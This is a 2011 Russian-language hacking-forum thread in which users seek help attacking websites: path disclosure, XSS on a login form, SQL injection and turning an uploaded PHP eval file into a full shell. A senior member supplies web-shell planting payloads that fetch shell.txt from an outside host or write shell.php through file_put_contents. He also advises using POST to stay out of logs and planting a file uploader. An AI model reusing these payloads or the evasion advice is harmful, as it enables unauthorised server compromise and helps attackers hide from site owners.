 |
|
29.07.2011, 16:56
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
Сообщение от Expl0ited
Использовать поиск по форуму: /showthread.php?t=191917
И внимательно читать не только первый пост.
прочитал всёравно ничего полезного не нашел. Может ктонить помочь плз?
|
|
|
29.07.2011, 17:52
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
С нами:
7990166
Репутация:
1
|
|
Каким образом найти раскрытие путей?
|
|
|
|
29.07.2011, 17:54
|
|
Участник форума
Регистрация: 04.07.2010
Сообщений: 249
С нами:
8345846
Репутация:
33
|
|
Сообщение от plaeer
Каким образом найти раскрытие путей?
/showthread.php?t=30632
|
|
|
|
29.07.2011, 17:58
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от plaeer
Каким образом найти раскрытие путей?
поиск - классная штука.
Код:
http://www.google.ru/search?client=opera&rls=en&q=site:forum.antichat.ru+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest
первая ссылка
Код:
/threadnav30632.html
и ещё куча тем и тому подобного.
|
|
|
|
29.07.2011, 19:46
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Зашел на один портал, решил проверить логин на xss, при вставке alert('12'); в любое поле(пароль;логин) ифрейм(вводятся данные в ифрейме) выдает -
Server Error in '/' Application.
Код:
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
можно как-то использовать в своих целях? |
|
|
|
29.07.2011, 21:17
|
|
Новичок
Регистрация: 23.01.2011
Сообщений: 0
С нами:
8053526
Репутация:
0
|
|
Здравствуйте. Помигите пожалуйста.
Допустим сайт вида http://sait.com/tut-tekst/i-tut.html
возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
|
|
|
|
29.07.2011, 21:26
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
С нами:
7990166
Репутация:
1
|
|
Такая проблема: залил файл с таким содержанием .
phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
|
|
|
|
29.07.2011, 21:34
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от plaeer
Такая проблема: залил файл с таким содержанием .
phpinfo вывелось без проблем, но когда делаю так eval(file_put_contents('site.ru/sh.txt')); , то ничего не происходит. Каким образом можно получить полноценный шелл?
во-первых, http://php.net/manual/ru/function.file-put-contents.php
во-вторых, magic quotes учитывай
а шелл так льется, например:
1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
|
|
|
|
29.07.2011, 22:01
|
|
Участник форума
Регистрация: 08.03.2011
Сообщений: 149
С нами:
7990166
Репутация:
1
|
|
Сообщение от попугай
во-первых, http://php.net/manual/ru/function.file-put-contents.php
во-вторых, magic quotes учитывай
а шелл так льется, например:
1=http://pentagon.gov/images/shell.txt&2=1.php&cmd=copy($_GET[1],$_GET[2]);
1.Прочитал.
2.magic_quotes_gpc On On
3. Не работает.
|
|
|
|
29.07.2011, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от plaeer
1.Прочитал.
2.magic_quotes_gpc On On
3. Не работает.
ну мог бы по аналогии fileputcontens заюзать
1=&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);
также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
